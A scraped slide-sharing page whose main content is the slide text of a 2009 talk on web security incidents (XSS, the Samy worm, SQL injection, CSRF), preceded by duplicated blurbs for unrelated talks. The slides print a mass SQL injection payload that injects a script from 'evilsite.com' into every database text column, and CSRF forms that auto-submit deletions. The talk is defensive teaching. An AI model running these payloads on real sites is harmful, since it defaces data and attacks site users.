This document summarizes Simon Willison's talk on web app security vulnerabilities and lessons learned from past mistakes. It discusses cross-site scripting (XSS) vulnerabilities that allow attackers to steal users' cookies or show fake login pages. It also covers SQL injection attacks, cross-site request forgery (CSRF), and how even features like CSS can be exploited. Past incidents like Samy's MySpace worm and the Google UTF-7 hole are examined to illustrate the dangers if vulnerabilities are left unaddressed. The talk emphasizes following best practices like parameterization and CSRF tokens to prevent common exploits.
The benefits of BDD (Behaviour-Driven Development)-style automated acceptance tests are huge. Far beyond simply testing your application, BDD uses automated acceptance tests to improve team collaboration and communication, focus development efforts on truly valuable features, and provide meaningful progress reports and reliable feature documentation.
However one of the biggest challenges to implementing Automated Acceptance Testing is writing them in a way that will be easy to maintain as the project progresses. Indeed, the cost of maintaining the acceptance test suite should not be more than the value that it provides.
This talk explores strategies for writing maintainable and meaningful automated acceptance tests, including aspects such as:
Challenges to maintaining automated acceptance tests
How to organise and structure your tests more effectively
Writing truly meaningful acceptance tests
When to test the UI, and when to test the backend
How to deal with database setup and teardown
How to avoid test fragility
How to get the most out of ATDD reporting
These are the slides from a talk "Analysis of mass SQL injection attacks" held at FSec 2012 conference (Croatia / Varazdin 21st September 2012) by Miroslav Stampar
The benefits of BDD (Behaviour-Driven Development)-style automated acceptance tests are huge. Far beyond simply testing your application, BDD uses automated acceptance tests to improve team collaboration and communication, focus development efforts on truly valuable features, and provide meaningful progress reports and reliable feature documentation.
However one of the biggest challenges to implementing Automated Acceptance Testing is writing them in a way that will be easy to maintain as the project progresses. Indeed, the cost of maintaining the acceptance test suite should not be more than the value that it provides.
This talk explores strategies for writing maintainable and meaningful automated acceptance tests, including aspects such as:
Challenges to maintaining automated acceptance tests
How to organise and structure your tests more effectively
Writing truly meaningful acceptance tests
When to test the UI, and when to test the backend
How to deal with database setup and teardown
How to avoid test fragility
How to get the most out of ATDD reporting
These are the slides from a talk "Analysis of mass SQL injection attacks" held at FSec 2012 conference (Croatia / Varazdin 21st September 2012) by Miroslav Stampar
A talk on my experiences building crowdsourcing applications, both at the Guardian newspaper and for my own personal projects. Presented at Web Directions @media 2010 on June 9th.
Keynote for DjangoCon 2009, presented on the 8th of September 2009. Covers two cowboy projects - WildLifeNearYou.com and MP expenses - and talks about ways of "reigning in the cowboy" and developing in a more sustainable way.
Keeping your web application secure is an ongoing process - new classes of vulnerabilities are discovered with surprising frequency, and if you don't keep on top of them you could be in for a nasty surprise. This talk will discuss both common and obscure vulnerabilities, with real-world examples of attacks that have worked against high profile sites in the past.
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
A talk on my experiences building crowdsourcing applications, both at the Guardian newspaper and for my own personal projects. Presented at Web Directions @media 2010 on June 9th.
Keynote for DjangoCon 2009, presented on the 8th of September 2009. Covers two cowboy projects - WildLifeNearYou.com and MP expenses - and talks about ways of "reigning in the cowboy" and developing in a more sustainable way.
Keeping your web application secure is an ongoing process - new classes of vulnerabilities are discovered with surprising frequency, and if you don't keep on top of them you could be in for a nasty surprise. This talk will discuss both common and obscure vulnerabilities, with real-world examples of attacks that have worked against high profile sites in the past.
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Albert Hoitingh
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview. Including the concepts of Customer Key and Double Key Encryption.
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Ramesh Iyer
In today's fast-changing business world, Companies that adapt and embrace new ideas often need help to keep up with the competition. However, fostering a culture of innovation takes much work. It takes vision, leadership and willingness to take risks in the right proportion. Sachin Dev Duggal, co-founder of Builder.ai, has perfected the art of this balance, creating a company culture where creativity and growth are nurtured at each stage.
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
After immersing yourself in the blue book and its red counterpart, attending DDD-focused conferences, and applying tactical patterns, you're left with a crucial question: How do I ensure my design is effective? Tactical patterns within Domain-Driven Design (DDD) serve as guiding principles for creating clear and manageable domain models. However, achieving success with these patterns requires additional guidance. Interestingly, we've observed that a set of constraints initially designed for training purposes remarkably aligns with effective pattern implementation, offering a more ‘mechanical’ approach. Let's explore together how Object Calisthenics can elevate the design of your tactical DDD patterns, offering concrete help for those venturing into DDD for the first time!
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
Web App Security Horror Stories
1. Web App Security
Horror Stories
Simon Willison, 6th March 2009
Saturday, 7 March 2009
2. This talk is about
learning from other
people’s mistakes
Saturday, 7 March 2009
3. XSS
(cross site scripting)
Saturday, 7 March 2009
4. Rule one:
Never let anyone
inject their JavaScript
in to your page
Saturday, 7 March 2009
5. If you have an XSS hole, I can
• Steal your users’ cookies and log in as them
• Embed malware and drive-by downloads
• Show a fake phishing login page on your site
• Perform any action as if I was your user
Saturday, 7 March 2009
8. samy is my hero
http://namb.la/popular/
Saturday, 7 March 2009
9. MySpace customisation
was “kind of a mistake”
http://bit.ly/myspace-mistake
Saturday, 7 March 2009
10. A social network worm
• When you viewed Samy’s profile...
• JS makes you add him as a friend
• JS uses XMLHttpRequest to add his
exploit to YOUR profile as well
Saturday, 7 March 2009
11. 4th October 2005
12:34 pm: You have 73 friends
I decided to release my little popularity program. I'm going
to be famous... among my friends.
1:30 am: You have 73 friends and 1 friend request
One of my friends' girlfriend looks at my profile. She's
obviously checking me out. I approve her inadvertent friend
request and go to bed grinning.
8:35 am: You have 74 friends and 221 friend requests
Woah. I did not expect this much. I'm surprised it even
worked.. 200 people have been infected in 8 hours. That
means I'll have 600 new friends added every day. Woah.
9:30 am: You have 74 friends and 480 friend requests
Oh wait, it's exponential, isn't it. Shit.
Saturday, 7 March 2009
12. 4th October 2005
12:34 pm: You have 73 friends
I decided to release my little popularity program. I'm going
to be famous... among my friends.
1:30 am: You have 73 friends and 1 friend request
One of my friends' girlfriend looks at my profile. She's
obviously checking me out. I approve her inadvertent friend
request and go to bed grinning.
8:35 am: You have 74 friends and 221 friend requests
Woah. I did not expect this much. I'm surprised it even
worked.. 200 people have been infected in 8 hours. That
means I'll have 600 new friends added every day. Woah.
9:30 am: You have 74 friends and 480 friend requests
Oh wait, it's exponential, isn't it. Shit.
Saturday, 7 March 2009
13. 4th October 2005
12:34 pm: You have 73 friends
I decided to release my little popularity program. I'm going
to be famous... among my friends.
1:30 am: You have 73 friends and 1 friend request
One of my friends' girlfriend looks at my profile. She's
obviously checking me out. I approve her inadvertent friend
request and go to bed grinning.
8:35 am: You have 74 friends and 221 friend requests
Woah. I did not expect this much. I'm surprised it even
worked.. 200 people have been infected in 8 hours. That
means I'll have 600 new friends added every day. Woah.
9:30 am: You have 74 friends and 480 friend requests
Oh wait, it's exponential, isn't it. Shit.
Saturday, 7 March 2009
14. 4th October 2005
12:34 pm: You have 73 friends
I decided to release my little popularity program. I'm going
to be famous... among my friends.
1:30 am: You have 73 friends and 1 friend request
One of my friends' girlfriend looks at my profile. She's
obviously checking me out. I approve her inadvertent friend
request and go to bed grinning.
8:35 am: You have 74 friends and 221 friend requests
Woah. I did not expect this much. I'm surprised it even
worked.. 200 people have been infected in 8 hours. That
means I'll have 600 new friends added every day. Woah.
9:30 am: You have 74 friends and 480 friend requests
Oh wait, it's exponential, isn't it. Shit.
Saturday, 7 March 2009
17. The UTF-7 hole
• Google’s 404 pages didn't specify a charset
• IE inspected the first 4096 bytes to “guess”
the encoding of the page
• UTF-7 XSS attacks slipped through Google's
XSS filters but were executed by IE
http://shiflett.org/blog/2005/dec/googles-xss-vulnerability
Saturday, 7 March 2009
18. You can’t trust CSS either
• HTC in IE and XBL in Mozilla are both vectors for
JavaScript attacks
• A “position: absolute” hack was used to steal 30,000
MySpace passwords last year
http://community.livejournal.com/lj_dev/708069.html
http://www.securiteam.com/securitynews/6O00M0AHFW.html
Saturday, 7 March 2009
20. Inexcusable.
Use paramaterised
queries, or an ORM
Saturday, 7 March 2009
21. If you’re gluing SQL
together using string
appends
Saturday, 7 March 2009
22. Bad (even though it's secure):
$sql = quot;select * from users where nick = 'quot;
. mysql_real_escape_string($username) . quot;'quot;;
Good:
$sql = build_query(
quot;select * from users where nick = ?quot;, $nick
);
Saturday, 7 March 2009
23. Mass XSS via SQL injection
DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
EXEC(
'update [' + @T + '] set [' + @C + '] =
rtrim(convert(varchar,[' + @C + ']))+
''<script src=http://evilsite.com/1.js></script>'''
);
FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;
http://hackademix.net/2008/04/26/mass-attack-faq/
Saturday, 7 March 2009
25. “We’ve found CSRF
vulnerabilities in sites that have a
huge incentive to do security
correctly. If you’re in charge of a
website and haven’t specifically
protected against CSRF, chances
are you’re vulnerable”
- Bill Zeller
Saturday, 7 March 2009
26. Ever see a link like this?
<a href=quot;http://app.example.com/delete.php?id=1quot;>Delete</a>
Saturday, 7 March 2009
27. Now what if I do this:
<img src=quot;http://app.example.com/delete.php?id=1quot;>
<img src=quot;http://app.example.com/delete.php?id=2quot;>
<img src=quot;http://app.example.com/delete.php?id=3quot;>
<img src=quot;http://app.example.com/delete.php?id=4quot;>
<img src=quot;http://app.example.com/delete.php?id=5quot;>
... and trick you in to
visiting my site?
Saturday, 7 March 2009
28. POST will not save you
<form action=quot;http://app.example.com/delete.phpquot;
method=quot;POSTquot;>
<input type=quot;hiddenquot; name=quot;idquot; value=quot;1quot;>
<input type=quot;submitquot; value=quot;More kittens please!quot;>
</form>
http://www.flickr.com/photos/fofurasfelinas/9724483/
Saturday, 7 March 2009
29. Or submit with JavaScript
<div style=quot;display: nonequot;>
<form action=quot;http://app.example.com/delete.phpquot;
method=quot;POSTquot;>
<input type=quot;hiddenquot; name=quot;idquot; value=quot;1quot;>
</form>
</div>
<script>document.forms[0].submit()</script>
Saturday, 7 March 2009
30. The Digg exploit
• A few years ago, Digg had no CSRF
protection on their “digg this” button
• The result: self-digging pages!
http://ha.ckers.org/blog/20060615/a-story-that-diggs-itself/
Saturday, 7 March 2009
31. The Gmail filter hack
http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/
Saturday, 7 March 2009
32. “We believe this is the first CSRF
vulnerability to allow the transfer of funds
from a financial institution.”
http://www.freedom-to-tinker.com/blog/wzeller/
popular-websites-vulnerable-cross-site-request-forgery-attacks
Saturday, 7 March 2009
33. Preventing CSRF
• You need to distinguish between form
interactions from your user on your site, and
form interactions from your user on some
other site
• Referrer checking is notoriously unreliable
• Solution: include a form token (Yahoo! calls
this a “crumb”) proving that the post came
from your site
Saturday, 7 March 2009
35. Protecting the crumb
• Your crumb is now the only thing protecting
you from CSRF attacks
• This is why XSS is such a big deal
• With XSS, I can steal your crumb and run
riot across your site
• XSS holes are automatically CSRF holes
Saturday, 7 March 2009
56. How did they do it?
They guessed the URL
Saturday, 7 March 2009
57. The Twitter hack
• A bored teenager ran a brute force
attack against a popular Twitter user
• quot;happinessquot; is a dictionary word
• She happened to be Twitter staff, with
admin access
Saturday, 7 March 2009
59. Keep admin accounts
separate from regular
user accounts
Saturday, 7 March 2009
60. crossdomain.xml
<cross-domain-policy>
<allow-access-from domain=quot;*quot; />
</cross-domain-policy>
Putting this at example.com/crossdomain.xml allows Flash applets
on other sites to read your pages and steal your crumbs
Flash can even fake an X-Requested-With: XMLHttpRequest header
That’s why Flickr use api.flickr.com/crossdomain.xml instead
Saturday, 7 March 2009
61. crossdomain.xml
<cross-domain-policy>
<allow-access-from domain=quot;*quot; />
</cross-domain-policy>
Putting this at example.com/crossdomain.xml allows Flash
applets on other sites to read your pages and steal your
crumbs
That’s why Flickr use api.flickr.com/crossdomain.xml instead
Saturday, 7 March 2009
62. YouTube/Gmail combo attack!
<allow-access-from domain=quot;*.google.comquot; />
1. Attacker emails a special SWF to a Gmail account they control
and locates the attachment download URL on google.com
2. Logged-in YouTube user visits an attacker controlled page
3. Attacker forces their victim to authenticate to the attackers
Gmail account (using login CSRF)
4. Attacker embeds SWF from the Gmail account into the web page
5. Attacker now has read write access on YouTube.com as the
victim’s account
http://jeremiahgrossman.blogspot.com/2008/09/i-used-to-know-what-you-watched-on.html
Saturday, 7 March 2009
63. No matter how hard you try, you
can’t secure your site 100%
There’s always a chance a
browser, plugin or compromised
client machine will screw
everything up anyway
Saturday, 7 March 2009
64. ... and 70% of users will give
their password to a stranger in
exchange for a bar of chocolate
http://news.bbc.co.uk/1/hi/technology/3639679.stm
Saturday, 7 March 2009